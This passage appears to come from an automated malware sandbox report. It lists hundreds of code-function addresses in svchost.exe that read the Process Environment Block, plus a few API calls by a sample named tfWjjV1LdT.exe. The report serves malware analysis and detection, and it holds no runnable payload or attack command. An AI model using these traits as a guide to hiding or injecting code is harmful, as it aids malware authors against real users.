Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006E80A9

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_006BA155
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BA124 SetUnhandledExceptionFilter,		0_2_006BA124

